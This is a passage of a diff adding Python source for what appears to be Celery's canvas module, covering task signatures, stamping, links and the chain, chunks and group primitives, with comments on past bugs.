new_options = self.options + if self.immutable and not force: + return (self.args, self.kwargs, new_options) + return (tuple(args) + tuple(self.args) if args else self.args, + dict(self.kwargs, **kwargs) if kwargs else self.kwargs, + new_options) + + def clone(self, args=None, kwargs=None, **opts): + """Create a copy of this signature. + + Arguments: + args (Tuple): Partial args to be prepended to the existing args. + kwargs (Dict): Partial kwargs to be merged with existing kwargs. + options (Dict): Partial options to be merged with + existing options. + """ + args = args if args else () + kwargs = kwargs if kwargs else {} + # need to deepcopy options so origins links etc. is not modified. + if args or kwargs or opts: + args, kwargs, opts = self._merge(args, kwargs, opts) + else: + args, kwargs, opts = self.args, self.kwargs, self.options + signature = Signature.from_dict({'task': self.task, + 'args': tuple(args), + 'kwargs': kwargs, + 'options': deepcopy(opts), + 'subtask_type': self.subtask_type, + 'immutable': self.immutable}, + app=self._app) + signature._type = self._type + return signature + + partial = clone + + def freeze(self, _id=None, group_id=None, chord=None, + root_id=None, parent_id=None, group_index=None): + """Finalize the signature by adding a concrete task id. + + The task won't be called and you shouldn't call the signature + twice after freezing it as that'll result in two task messages + using the same task id. + + The arguments are used to override the signature's headers during + freezing. + + Arguments: + _id (str): Task id to use if it didn't already have one. + New UUID is generated if not provided. + group_id (str): Group id to use if it didn't already have one. + chord (Signature): Chord body when freezing a chord header. + root_id (str): Root id to use. + parent_id (str): Parent id to use. + group_index (int): Group index to use. + + Returns: + ~@AsyncResult: promise of future evaluation. + """ + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + opts = self.options + try: + # if there is already an id for this task, return it + tid = opts['task_id'] + except KeyError: + # otherwise, use the _id sent to this function, falling back on a generated UUID + tid = opts['task_id'] = _id or uuid() + if root_id: + opts['root_id'] = root_id + if parent_id: + opts['parent_id'] = parent_id + if 'reply_to' not in opts: + # fall back on unique ID for this thread in the app + opts['reply_to'] = self.app.thread_oid + if group_id and "group_id" not in opts: + opts['group_id'] = group_id + if chord: + opts['chord'] = chord + if group_index is not None: + opts['group_index'] = group_index + # pylint: disable=too-many-function-args + # Borks on this, as it's a property. + return self.AsyncResult(tid) + + _freeze = freeze + + def replace(self, args=None, kwargs=None, options=None): + """Replace the args, kwargs or options set for this signature. + + These are only replaced if the argument for the section is + not :const:`None`. + """ + signature = self.clone() + if args is not None: + signature.args = args + if kwargs is not None: + signature.kwargs = kwargs + if options is not None: + signature.options = options + return signature + + def set(self, immutable=None, **options): + """Set arbitrary execution options (same as ``.options.update(…)``). + + Returns: + Signature: This is a chaining method call + (i.e., it will return ``self``). + """ + if immutable is not None: + self.set_immutable(immutable) + self.options.update(options) + return self + + def set_immutable(self, immutable): + self.immutable = immutable + + def _stamp_headers(self, visitor_headers=None, append_stamps=False, self_headers=True, **headers): + """Collect all stamps from visitor, headers and self, + and return an idempotent dictionary of stamps. + + .. versionadded:: 5.3 + + Arguments: + visitor_headers (Dict): Stamps from a visitor method. + append_stamps (bool): + If True, duplicated stamps will be appended to a list. + If False, duplicated stamps will be replaced by the last stamp. + self_headers (bool): + If True, stamps from self.options will be added. + If False, stamps from self.options will be ignored. + headers (Dict): Stamps that should be added to headers. + + Returns: + Dict: Merged stamps. + """ + # Use append_stamps=False to prioritize visitor_headers over headers in case of duplicated stamps. + # This will lose duplicated headers from the headers argument, but that is the best effort solution + # to avoid implicitly casting the duplicated stamp into a list of both stamps from headers and + # visitor_headers of the same key. + # Example: + # headers = {"foo": "bar1"} + # visitor_headers = {"foo": "bar2"} + # _merge_dictionaries(headers, visitor_headers, aggregate_duplicates=True) + # headers["foo"] == ["bar1", "bar2"] -> The stamp is now a list + # _merge_dictionaries(headers, visitor_headers, aggregate_duplicates=False) + # headers["foo"] == "bar2" -> "bar1" is lost, but the stamp is according to the visitor + + headers = headers.copy() + + if "stamped_headers" not in headers: + headers["stamped_headers"] = list(headers.keys()) + + # Merge headers with visitor headers + if visitor_headers is not None: + visitor_headers = visitor_headers or {} + if "stamped_headers" not in visitor_headers: + visitor_headers["stamped_headers"] = list(visitor_headers.keys()) + + # Sync from visitor + _merge_dictionaries(headers, visitor_headers, aggregate_duplicates=append_stamps) + headers["stamped_headers"] = list(set(headers["stamped_headers"])) + + # Merge headers with self.options + if self_headers: + stamped_headers = set(headers.get("stamped_headers", [])) + stamped_headers.update(self.options.get("stamped_headers", [])) + headers["stamped_headers"] = list(stamped_headers) + # Only merge stamps that are in stamped_headers from self.options + redacted_options = {k: v for k, v in self.options.items() if k in headers["stamped_headers"]} + + # Sync from self.options + _merge_dictionaries(headers, redacted_options, aggregate_duplicates=append_stamps) + headers["stamped_headers"] = list(set(headers["stamped_headers"])) + + return headers + + def stamp(self, visitor=None, append_stamps=False, **headers): + """Stamp this signature with additional custom headers. + Using a visitor will pass on responsibility for the stamping + to the visitor. + + .. versionadded:: 5.3 + + Arguments: + visitor (StampingVisitor): Visitor API object. + append_stamps (bool): + If True, duplicated stamps will be appended to a list. + If False, duplicated stamps will be replaced by the last stamp. + headers (Dict): Stamps that should be added to headers. + """ + self.stamp_links(visitor, append_stamps, **headers) + headers = headers.copy() + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_signature(self, **headers) or {} + headers = self._stamp_headers(visitor_headers, append_stamps, **headers) + return self.set(**headers) + + def stamp_links(self, visitor, append_stamps=False, **headers): + """Stamp this signature links (callbacks and errbacks). + Using a visitor will pass on responsibility for the stamping + to the visitor. + + Arguments: + visitor (StampingVisitor): Visitor API object. + append_stamps (bool): + If True, duplicated stamps will be appended to a list. + If False, duplicated stamps will be replaced by the last stamp. + headers (Dict): Stamps that should be added to headers. + """ + non_visitor_headers = headers.copy() + + # When we are stamping links, we want to avoid adding stamps from the linked signature itself + # so we turn off self_headers to stamp the link only with the visitor and the headers. + # If it's enabled, the link copies the stamps of the linked signature, and we don't want that. + self_headers = False + + # Stamp all of the callbacks of this signature + headers = deepcopy(non_visitor_headers) + for link in maybe_list(self.options.get('link')) or []: + link = maybe_signature(link, app=self.app) + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_callback(link, **headers) or {} + headers = self._stamp_headers( + visitor_headers=visitor_headers, + append_stamps=append_stamps, + self_headers=self_headers, + **headers + ) + link.stamp(visitor, append_stamps, **headers) + + # Stamp all of the errbacks of this signature + headers = deepcopy(non_visitor_headers) + for link in maybe_list(self.options.get('link_error')) or []: + link = maybe_signature(link, app=self.app) + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_errback(link, **headers) or {} + headers = self._stamp_headers( + visitor_headers=visitor_headers, + append_stamps=append_stamps, + self_headers=self_headers, + **headers + ) + link.stamp(visitor, append_stamps, **headers) + + def _with_list_option(self, key): + """Gets the value at the given self.options[key] as a list. + + If the value is not a list, it will be converted to one and saved in self.options. + If the key does not exist, an empty list will be set and returned instead. + + Arguments: + key (str): The key to get the value for. + + Returns: + List: The value at the given key as a list or an empty list if the key does not exist. + """ + items = self.options.setdefault(key, []) + if not isinstance(items, MutableSequence): + items = self.options[key] = [items] + return items + + def append_to_list_option(self, key, value): + """Appends the given value to the list at the given key in self.options.""" + items = self._with_list_option(key) + if value not in items: + items.append(value) + return value + + def extend_list_option(self, key, value): + """Extends the list at the given key in self.options with the given value. + + If the value is not a list, it will be converted to one. + """ + items = self._with_list_option(key) + items.extend(maybe_list(value)) + + def link(self, callback): + """Add callback task to be applied if this task succeeds. + + Returns: + Signature: the argument passed, for chaining + or use with :func:`~functools.reduce`. + """ + return self.append_to_list_option('link', callback) + + def link_error(self, errback): + """Add callback task to be applied on error in task execution. + + Returns: + Signature: the argument passed, for chaining + or use with :func:`~functools.reduce`. + """ + return self.append_to_list_option('link_error', errback) + + def on_error(self, errback): + """Version of :meth:`link_error` that supports chaining. + + on_error chains the original signature, not the errback so:: + + >>> add.s(2, 2).on_error(errback.s()).delay() + + calls the ``add`` task, not the ``errback`` task, but the + reverse is true for :meth:`link_error`. + """ + self.link_error(errback) + return self + + def flatten_links(self): + """Return a recursive list of dependencies. + + "unchain" if you will, but with links intact. + """ + return list(itertools.chain.from_iterable(itertools.chain( + [[self]], + (link.flatten_links() + for link in maybe_list(self.options.get('link')) or []) + ))) + + def __or__(self, other): + """Chaining operator. + + Example: + >>> add.s(2, 2) | add.s(4) | add.s(8) + + Returns: + chain: Constructs a :class:`~celery.canvas.chain` of the given signatures. + """ + if isinstance(other, _chain): + # task | chain -> chain + return _chain(seq_concat_seq( + (self,), other.unchain_tasks()), app=self._app) + elif isinstance(other, group): + # unroll group with one member + other = maybe_unroll_group(other) + # task | group() -> chain + return _chain(self, other, app=self.app) + elif isinstance(other, Signature): + # task | task -> chain + return _chain(self, other, app=self._app) + return NotImplemented + + def __ior__(self, other): + # Python 3.9 introduces | as the merge operator for dicts. + # We override the in-place version of that operator + # so that canvases continue to work as they did before. + return self.__or__(other) + + def election(self): + type = self.type + app = type.app + tid = self.options.get('task_id') or uuid() + + with app.producer_or_acquire(None) as producer: + props = type.backend.on_task_call(producer, tid) + app.control.election(tid, 'task', + self.clone(task_id=tid, **props), + connection=producer.connection) + return type.AsyncResult(tid) + + def reprcall(self, *args, **kwargs): + """Return a string representation of the signature. + + Merges the given arguments with the signature's arguments + only for the purpose of generating the string representation. + The signature itself is not modified. + + Example: + >>> add.s(2, 2).reprcall() + 'add(2, 2)' + """ + args, kwargs, _ = self._merge(args, kwargs, {}, force=True) + return reprcall(self['task'], args, kwargs) + + def __deepcopy__(self, memo): + memo[id(self)] = self + return dict(self) # TODO: Potential bug of being a shallow copy + + def __invert__(self): + return self.apply_async().get() + + def __reduce__(self): + # for serialization, the task type is lazily loaded, + # and not stored in the dict itself. + return signature, (dict(self),) + + def __json__(self): + return dict(self) + + def __repr__(self): + return self.reprcall() + + def items(self): + for k, v in super().items(): + yield k.decode() if isinstance(k, bytes) else k, v + + @property + def name(self): + # for duck typing compatibility with Task.name + return self.task + + @cached_property + def type(self): + return self._type or self.app.tasks[self['task']] + + @cached_property + def app(self): + return self._app or current_app + + @cached_property + def AsyncResult(self): + try: + return self.type.AsyncResult + except KeyError: # task not registered + return self.app.AsyncResult + + @cached_property + def _apply_async(self): + try: + return self.type.apply_async + except KeyError: + return _partial(self.app.send_task, self['task']) + + id = getitem_property('options.task_id', 'Task UUID') + parent_id = getitem_property('options.parent_id', 'Task parent UUID.') + root_id = getitem_property('options.root_id', 'Task root UUID.') + task = getitem_property('task', 'Name of task.') + args = getitem_property('args', 'Positional arguments to task.') + kwargs = getitem_property('kwargs', 'Keyword arguments to task.') + options = getitem_property('options', 'Task execution options.') + subtask_type = getitem_property('subtask_type', 'Type of signature') + immutable = getitem_property( + 'immutable', 'Flag set if no longer accepts new arguments') + + +def _prepare_chain_from_options(options, tasks, use_link): + # When we publish groups we reuse the same options dictionary for all of + # the tasks in the group. See: + # https://github.com/celery/celery/blob/fb37cb0b8/celery/canvas.py#L1022. + # Issue #5354 reported that the following type of canvases + # causes a Celery worker to hang: + # group( + # add.s(1, 1), + # add.s(1, 1) + # ) | tsum.s() | add.s(1) | group(add.s(1), add.s(1)) + # The resolution of #5354 in PR #5681 was to only set the `chain` key + # in the options dictionary if it is not present. + # Otherwise we extend the existing list of tasks in the chain with the new + # tasks: options['chain'].extend(chain_). + # Before PR #5681 we overrode the `chain` key in each iteration + # of the loop which applies all the tasks in the group: + # options['chain'] = tasks if not use_link else None + # This caused Celery to execute chains correctly in most cases since + # in each iteration the `chain` key would reset itself to a new value + # and the side effect of mutating the key did not propagate + # to the next task in the group. + # Since we now mutated the `chain` key, a *list* which is passed + # by *reference*, the next task in the group will extend the list + # of tasks in the chain instead of setting a new one from the chain_ + # variable above. + # This causes Celery to execute a chain, even though there might not be + # one to begin with. Alternatively, it causes Celery to execute more tasks + # that were previously present in the previous task in the group. + # The solution is to be careful and never mutate the options dictionary + # to begin with. + # Here is an example of a canvas which triggers this issue: + # add.s(5, 6) | group((add.s(1) | add.s(2), add.s(3))). + # The expected result is [14, 14]. However, when we extend the `chain` + # key the `add.s(3)` task erroneously has `add.s(2)` in its chain since + # it was previously applied to `add.s(1)`. + # Without being careful not to mutate the options dictionary, the result + # in this case is [16, 14]. + # To avoid deep-copying the entire options dictionary every single time we + # run a chain we use a ChainMap and ensure that we never mutate + # the original `chain` key, hence we use list_a + list_b to create a new + # list. + if use_link: + return ChainMap({'chain': None}, options) + elif 'chain' not in options: + return ChainMap({'chain': tasks}, options) + elif tasks is not None: + # chain option may already be set, resulting in + # "multiple values for keyword argument 'chain'" error. + # Issue #3379. + # If a chain already exists, we need to extend it with the next + # tasks in the chain. + # Issue #5354. + # WARNING: Be careful not to mutate `options['chain']`. + return ChainMap({'chain': options['chain'] + tasks}, + options) + + +@Signature.register_type(name='chain') +class _chain(Signature): + tasks = getitem_property('kwargs.tasks', 'Tasks in chain.') + + @classmethod + def from_dict(cls, d, app=None): + tasks = d['kwargs']['tasks'] + if tasks: + if isinstance(tasks, tuple): # aaaargh + tasks = d['kwargs']['tasks'] = list(tasks) + tasks = [maybe_signature(task, app=app) for task in tasks] + return cls(tasks, app=app, **d['options']) + + def __init__(self, *tasks, **options): + tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0]) + else tasks) + super().__init__('celery.chain', (), {'tasks': tasks}, **options + ) + self._use_link = options.pop('use_link', None) + self.subtask_type = 'chain' + self._frozen = None + + def __call__(self, *args, **kwargs): + if self.tasks: + return self.apply_async(args, kwargs) + + def __or__(self, other): + if isinstance(other, group): + # unroll group with one member + other = maybe_unroll_group(other) + # chain | group() -> chain + tasks = self.unchain_tasks() + if not tasks: + # If the chain is empty, return the group + return other + if isinstance(tasks[-1], chord): + # CHAIN [last item is chord] | GROUP -> chain with chord body. + tasks[-1].body = tasks[-1].body | other + return type(self)(tasks, app=self.app) + # use type(self) for _chain subclasses + return type(self)(seq_concat_item( + tasks, other), app=self._app) + elif isinstance(other, _chain): + # chain | chain -> chain + # use type(self) for _chain subclasses + return type(self)(seq_concat_seq( + self.unchain_tasks(), other.unchain_tasks()), app=self._app) + elif isinstance(other, Signature): + if self.tasks and isinstance(self.tasks[-1], group): + # CHAIN [last item is group] | TASK -> chord + sig = self.clone() + sig.tasks[-1] = chord( + sig.tasks[-1], other, app=self._app) + return sig + elif self.tasks and isinstance(self.tasks[-1], chord): + # CHAIN [last item is chord] -> chain with chord body. + sig = self.clone() + sig.tasks[-1].body = sig.tasks[-1].body | other + return sig + else: + # chain | task -> chain + # use type(self) for _chain subclasses + return type(self)(seq_concat_item( + self.unchain_tasks(), other), app=self._app) + else: + return NotImplemented + + def clone(self, *args, **kwargs): + to_signature = maybe_signature + signature = super().clone(*args, **kwargs) + signature.kwargs['tasks'] = [ + to_signature(sig, app=self._app, clone=True) + for sig in signature.kwargs['tasks'] + ] + return signature + + def unchain_tasks(self): + """Return a list of tasks in the chain. + + The tasks list would be cloned from the chain's tasks. + All of the chain callbacks would be added to the last task in the (cloned) chain. + All of the tasks would be linked to the same error callback + as the chain itself, to ensure that the correct error callback is called + if any of the (cloned) tasks of the chain fail. + """ + # Clone chain's tasks assigning signatures from link_error + # to each task and adding the chain's links to the last task. + tasks = [t.clone() for t in self.tasks] + for sig in maybe_list(self.options.get('link')) or []: + tasks[-1].link(sig) + for sig in maybe_list(self.options.get('link_error')) or []: + for task in tasks: + task.link_error(sig) + return tasks + + def apply_async(self, args=None, kwargs=None, **options): + # python is best at unpacking kwargs, so .run is here to do that. + args = args if args else () + kwargs = kwargs if kwargs else [] + app = self.app + + if app.conf.task_always_eager: + with allow_join_result(): + return self.apply(args, kwargs, **options) + return self.run(args, kwargs, app=app, **( + dict(self.options, **options) if options else self.options)) + + def run(self, args=None, kwargs=None, group_id=None, chord=None, + task_id=None, link=None, link_error=None, publisher=None, + producer=None, root_id=None, parent_id=None, app=None, + group_index=None, **options): + """Executes the chain. + + Responsible for executing the chain in the correct order. + In a case of a chain of a single task, the task is executed directly + and the result is returned for that task specifically. + """ + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + args = args if args else () + kwargs = kwargs if kwargs else [] + app = app or self.app + use_link = self._use_link + if use_link is None and app.conf.task_protocol == 1: + use_link = True + args = (tuple(args) + tuple(self.args) + if args and not self.immutable else self.args) + + # Unpack nested chains/groups/chords + tasks, results_from_prepare = self.prepare_steps( + args, kwargs, self.tasks, root_id, parent_id, link_error, app, + task_id, group_id, chord, group_index=group_index, + ) + + # For a chain of single task, execute the task directly and return the result for that task + # For a chain of multiple tasks, execute all of the tasks and return the AsyncResult for the chain + if results_from_prepare: + if link: + tasks[0].extend_list_option('link', link) + first_task = tasks.pop() + options = _prepare_chain_from_options(options, tasks, use_link) + + result_from_apply = first_task.apply_async(**options) + # If we only have a single task, it may be important that we pass + # the real result object rather than the one obtained via freezing. + # e.g. For `GroupResult`s, we need to pass back the result object + # which will actually have its promise fulfilled by the subtasks, + # something that will never occur for the frozen result. + if not tasks: + return result_from_apply + else: + return results_from_prepare[0] + + # in order for a chain to be frozen, each of the members of the chain individually needs to be frozen + # TODO figure out why we are always cloning before freeze + def freeze(self, _id=None, group_id=None, chord=None, + root_id=None, parent_id=None, group_index=None): + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + _, results = self._frozen = self.prepare_steps( + self.args, self.kwargs, self.tasks, root_id, parent_id, None, + self.app, _id, group_id, chord, clone=False, + group_index=group_index, + ) + return results[0] + + def stamp(self, visitor=None, append_stamps=False, **headers): + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_chain_start(self, **headers) or {} + headers = self._stamp_headers(visitor_headers, append_stamps, **headers) + self.stamp_links(visitor, **headers) + + for task in self.tasks: + task.stamp(visitor, append_stamps, **headers) + + if visitor is not None: + visitor.on_chain_end(self, **headers) + + def prepare_steps(self, args, kwargs, tasks, + root_id=None, parent_id=None, link_error=None, app=None, + last_task_id=None, group_id=None, chord_body=None, + clone=True, from_dict=Signature.from_dict, + group_index=None): + """Prepare the chain for execution. + + To execute a chain, we first need to unpack it correctly. + During the unpacking, we might encounter other chains, groups, or chords + which we need to unpack as well. + + For example: + chain(signature1, chain(signature2, signature3)) --> Upgrades to chain(signature1, signature2, signature3) + chain(group(signature1, signature2), signature3) --> Upgrades to chord([signature1, signature2], signature3) + + The responsibility of this method is to ensure that the chain is + correctly unpacked, and then the correct callbacks are set up along the way. + + Arguments: + args (Tuple): Partial args to be prepended to the existing args. + kwargs (Dict): Partial kwargs to be merged with existing kwargs. + tasks (List[Signature]): The tasks of the chain. + root_id (str): The id of the root task. + parent_id (str): The id of the parent task. + link_error (Union[List[Signature], Signature]): The error callback. + will be set for all tasks in the chain. + app (Celery): The Celery app instance. + last_task_id (str): The id of the last task in the chain. + group_id (str): The id of the group that the chain is a part of. + chord_body (Signature): The body of the chord, used to synchronize with the chain's + last task and the chord's body when used together. + clone (bool): Whether to clone the chain's tasks before modifying them. + from_dict (Callable): A function that takes a dict and returns a Signature. + + Returns: + Tuple[List[Signature], List[AsyncResult]]: The frozen tasks of the chain, and the async results + """ + app = app or self.app + # use chain message field for protocol 2 and later. + # this avoids pickle blowing the stack on the recursion + # required by linking task together in a tree structure. + # (why is pickle using recursion? or better yet why cannot python + # do tail call optimization making recursion actually useful?) + use_link = self._use_link + if use_link is None and app.conf.task_protocol == 1: + use_link = True + steps = deque(tasks) + + # optimization: now the pop func is a local variable + steps_pop = steps.pop + steps_extend = steps.extend + + prev_task = None + prev_res = None + tasks, results = [], [] + i = 0 + # NOTE: We are doing this in reverse order. + # The result is a list of tasks in reverse order, that is + # passed as the ``chain`` message field. + # As it's reversed the worker can just do ``chain.pop()`` to + # get the next task in the chain. + while steps: + task = steps_pop() + # if steps is not empty, this is the first task - reverse order + # if i = 0, this is the last task - again, because we're reversed + is_first_task, is_last_task = not steps, not i + + if not isinstance(task, abstract.CallableSignature): + task = from_dict(task, app=app) + if isinstance(task, group): + # when groups are nested, they are unrolled - all tasks within + # groups should be called in parallel + task = maybe_unroll_group(task) + + # first task gets partial args from chain + if clone: + if is_first_task: + task = task.clone(args, kwargs) + else: + task = task.clone() + elif is_first_task: + task.args = tuple(args) + tuple(task.args) + + if isinstance(task, _chain): + # splice (unroll) the chain + steps_extend(task.tasks) + continue + + # TODO why isn't this asserting is_last_task == False? + if isinstance(task, group) and prev_task: + # automatically upgrade group(...) | s to chord(group, s) + # for chords we freeze by pretending it's a normal + # signature instead of a group. + tasks.pop() + results.pop() + try: + task = chord( + task, body=prev_task, + task_id=prev_res.task_id, root_id=root_id, app=app, + ) + except AttributeError: + # A GroupResult does not have a task_id since it consists + # of multiple tasks. + # We therefore, have to construct the chord without it. + # Issues #5467, #3585. + task = chord( + task, body=prev_task, + root_id=root_id, app=app, + ) + + if is_last_task: + # chain(task_id=id) means task id is set for the last task + # in the chain. If the chord is part of a chord/group + # then that chord/group must synchronize based on the + # last task in the chain, so we only set the group_id and + # chord callback for the last task. + res = task.freeze( + last_task_id, + root_id=root_id, group_id=group_id, chord=chord_body, + group_index=group_index, + ) + else: + res = task.freeze(root_id=root_id) + + i += 1 + + if prev_task: + if use_link: + # link previous task to this task. + task.link(prev_task) + + if prev_res and not prev_res.parent: + prev_res.parent = res + + if link_error: + for errback in maybe_list(link_error): + task.link_error(errback) + + tasks.append(task) + results.append(res) + + prev_task, prev_res = task, res + if isinstance(task, chord): + app.backend.ensure_chords_allowed() + # If the task is a chord, and the body is a chain + # the chain has already been prepared, and res is + # set to the last task in the callback chain. + + # We need to change that so that it points to the + # group result object. + node = res + while node.parent: + node = node.parent + prev_res = node + return tasks, results + + def apply(self, args=None, kwargs=None, **options): + args = args if args else () + kwargs = kwargs if kwargs else {} + last, (fargs, fkwargs) = None, (args, kwargs) + for task in self.tasks: + res = task.clone(fargs, fkwargs).apply( + last and (last.get(),), **dict(self.options, **options)) + res.parent, last, (fargs, fkwargs) = last, res, (None, None) + return last + + @property + def app(self): + app = self._app + if app is None: + try: + app = self.tasks[0]._app + except LookupError: + pass + return app or current_app + + def __repr__(self): + if not self.tasks: + return f'<{type(self).__name__}@{id(self):#x}: empty>' + return remove_repeating_from_task( + self.tasks[0]['task'], + ' | '.join(repr(t) for t in self.tasks)) + + +class chain(_chain): + """Chain tasks together. + + Each tasks follows one another, + by being applied as a callback of the previous task. + + Note: + If called with only one argument, then that argument must + be an iterable of tasks to chain: this allows us + to use generator expressions. + + Example: + This is effectively :math:`((2 + 2) + 4)`: + + .. code-block:: pycon + + >>> res = chain(add.s(2, 2), add.s(4))() + >>> res.get() + 8 + + Calling a chain will return the result of the last task in the chain. + You can get to the other tasks by following the ``result.parent``'s: + + .. code-block:: pycon + + >>> res.parent.get() + 4 + + Using a generator expression: + + .. code-block:: pycon + + >>> lazy_chain = chain(add.s(i) for i in range(10)) + >>> res = lazy_chain(3) + + Arguments: + *tasks (Signature): List of task signatures to chain. + If only one argument is passed and that argument is + an iterable, then that'll be used as the list of signatures + to chain instead. This means that you can use a generator + expression. + + Returns: + ~celery.chain: A lazy signature that can be called to apply the first + task in the chain. When that task succeeds the next task in the + chain is applied, and so on. + """ + + # could be function, but must be able to reference as :class:`chain`. + def __new__(cls, *tasks, **kwargs): + # This forces `chain(X, Y, Z)` to work the same way as `X | Y | Z` + if not kwargs and tasks: + if len(tasks) != 1 or is_list(tasks[0]): + tasks = tasks[0] if len(tasks) == 1 else tasks + # if is_list(tasks) and len(tasks) == 1: + # return super(chain, cls).__new__(cls, tasks, **kwargs) + new_instance = reduce(operator.or_, tasks, _chain()) + if cls != chain and isinstance(new_instance, _chain) and not isinstance(new_instance, cls): + return super().__new__(cls, new_instance.tasks, **kwargs) + return new_instance + return super().__new__(cls, *tasks, **kwargs) + + +class _basemap(Signature): + _task_name = None + _unpack_args = itemgetter('task', 'it') + + @classmethod + def from_dict(cls, d, app=None): + return cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']) + + def __init__(self, task, it, **options): + super().__init__(self._task_name, (), + {'task': task, 'it': regen(it)}, immutable=True, **options + ) + + def apply_async(self, args=None, kwargs=None, **opts): + # need to evaluate generators + args = args if args else () + kwargs = kwargs if kwargs else {} + task, it = self._unpack_args(self.kwargs) + return self.type.apply_async( + (), {'task': task, 'it': list(it)}, + route_name=task_name_from(self.kwargs.get('task')), **opts + ) + + +@Signature.register_type() +class xmap(_basemap): + """Map operation for tasks. + + Note: + Tasks executed sequentially in process, this is not a + parallel operation like :class:`group`. + """ + + _task_name = 'celery.map' + + def __repr__(self): + task, it = self._unpack_args(self.kwargs) + return f'[{task.task}(x) for x in {truncate(repr(it), 100)}]' + + +@Signature.register_type() +class xstarmap(_basemap): + """Map operation for tasks, using star arguments.""" + + _task_name = 'celery.starmap' + + def __repr__(self): + task, it = self._unpack_args(self.kwargs) + return f'[{task.task}(*x) for x in {truncate(repr(it), 100)}]' + + +@Signature.register_type() +class chunks(Signature): + """Partition of tasks into chunks of size n.""" + + _unpack_args = itemgetter('task', 'it', 'n') + + @classmethod + def from_dict(cls, d, app=None): + return cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']) + + def __init__(self, task, it, n, **options): + super().__init__('celery.chunks', (), + {'task': task, 'it': regen(it), 'n': n}, + immutable=True, **options + ) + + def __call__(self, **options): + return self.apply_async(**options) + + def apply_async(self, args=None, kwargs=None, **opts): + args = args if args else () + kwargs = kwargs if kwargs else {} + return self.group().apply_async( + args, kwargs, + route_name=task_name_from(self.kwargs.get('task')), **opts + ) + + def group(self): + # need to evaluate generators + task, it, n = self._unpack_args(self.kwargs) + return group((xstarmap(task, part, app=self._app) + for part in _chunks(iter(it), n)), + app=self._app) + + @classmethod + def apply_chunks(cls, task, it, n, app=None): + return cls(task, it, n, app=app)() + + +def _maybe_group(tasks, app): + if isinstance(tasks, dict): + tasks = signature(tasks, app=app) + + if isinstance(tasks, (group, _chain)): + tasks = tasks.tasks + elif isinstance(tasks, abstract.CallableSignature): + tasks = [tasks] + else: + if isinstance(tasks, GeneratorType): + tasks = regen(signature(t, app=app) for t in tasks) + else: + tasks = [signature(t, app=app) for t in tasks] + return tasks + + +@Signature.register_type() +class group(Signature): + """Creates a group of tasks to be executed in parallel. + + A group is lazy so you must call it to take action and evaluate + the group. + + Note: + If only one argument is passed, and that argument is an iterable + then that'll be used as the list of tasks instead: this + allows us to use ``group`` with generator expressions. + + Example: + >>> lazy_group = group([add.s(2, 2), add.s(4, 4)]) + >>> promise = lazy_group() # <-- evaluate: returns lazy result. + >>> promise.get() # <-- will wait for the task to return + [4, 8] + + Arguments: + *tasks (List[Signature]): A list of signatures that this group will + call. If there's only one argument, and that argument is an + iterable, then that'll define the list of signatures instead. + **options (Any): Execution options applied to all tasks + in the group. + + Returns: + ~celery.group: signature that when called will then call all of the + tasks in the group (and return a :class:`GroupResult` instance + that can be used to inspect the state of the group). + """ + + tasks = getitem_property('kwargs.tasks', 'Tasks in group.') + + @classmethod + def from_dict(cls, d, app=None): + """Create a group signature from a dictionary that represents a group. + + Example: + >>> group_dict = { + "task": "celery.group", + "args": [], + "kwargs": { + "tasks": [ + { + "task": "add", + "args": [ + 1, + 2 + ], + "kwargs": {}, + "options": {}, + "subtask_type": None, + "immutable": False + }, + { + "task": "add", + "args": [ + 3, + 4 + ], + "kwargs": {}, + "options": {}, + "subtask_type": None, + "immutable": False + } + ] + }, + "options": {}, + "subtask_type": "group", + "immutable": False + } + >>> group_sig = group.from_dict(group_dict) + + Iterates over the given tasks in the dictionary and convert them to signatures. + Tasks needs to be defined in d['kwargs']['tasks'] as a sequence + of tasks. + + The tasks themselves can be dictionaries or signatures (or both). + """ + # We need to mutate the `kwargs` element in place to avoid confusing + # `freeze()` implementations which end up here and expect to be able to + # access elements from that dictionary later and refer to objects + # canonicalized here + orig_tasks = d["kwargs"]["tasks"] + d["kwargs"]["tasks"] = rebuilt_tasks = type(orig_tasks)( + maybe_signature(task, app=app) for task in orig_tasks + ) + return cls(rebuilt_tasks, app=app, **d['options']) + + def __init__(self, *tasks, **options): + if len(tasks) == 1: + tasks = tasks[0] + if isinstance(tasks, group): + tasks = tasks.tasks + if isinstance(tasks, abstract.CallableSignature): + tasks = [tasks.clone()] + if not isinstance(tasks, _regen): + # May potentially cause slow downs when using a + # generator of many tasks - Issue #6973 + tasks = regen(tasks) + super().__init__('celery.group', (), {'tasks': tasks}, **options + ) + self.subtask_type = 'group' + + def __call__(self, *partial_args, **options): + return self.apply_async(partial_args, **options) + + def __or__(self, other): + # group() | task -> chord + return chord(self, body=other, app=self._app) + + def skew(self, start=1.0, stop=None, step=1.0): + # TODO: Not sure if this is still used anywhere (besides its own tests). Consider removing. + it = fxrange(start, stop, step, repeatlast=True) + for task in self.tasks: + task.set(countdown=next(it)) + return self + + def apply_async(self, args=None, kwargs=None, add_to_parent=True, + producer=None, link=None, link_error=None, **options): + args = args if args else () + if link is not None: + raise TypeError('Cannot add link to group: use a chord') + if link_error is not None: + raise TypeError( + 'Cannot add link to group: do that on individual tasks') + app = self.app + if app.conf.task_always_eager: + return self.apply(args, kwargs, **options) + if not self.tasks: + return self.freeze() + + options, group_id, root_id = self._freeze_gid(options) + tasks = self._prepared(self.tasks, [], group_id, root_id, app) + p = barrier() + results = list(self._apply_tasks(tasks, producer, app, p, + args=args, kwargs=kwargs, **options)) + result = self.app.GroupResult(group_id, results, ready_barrier=p) + p.finalize() + + # - Special case of group(A.s() | group(B.s(), C.s())) + # That is, group with single item that's a chain but the + # last task in that chain is a group. + # + # We cannot actually support arbitrary GroupResults in chains, + # but this special case we can. + if len(result) == 1 and isinstance(result[0], GroupResult): + result = result[0] + + parent_task = app.current_worker_task + if add_to_parent and parent_task: + parent_task.add_trail(result) + return result + + def apply(self, args=None, kwargs=None, **options): + args = args if args else () + kwargs = kwargs if kwargs else {} + app = self.app + if not self.tasks: + return self.freeze() # empty group returns GroupResult + 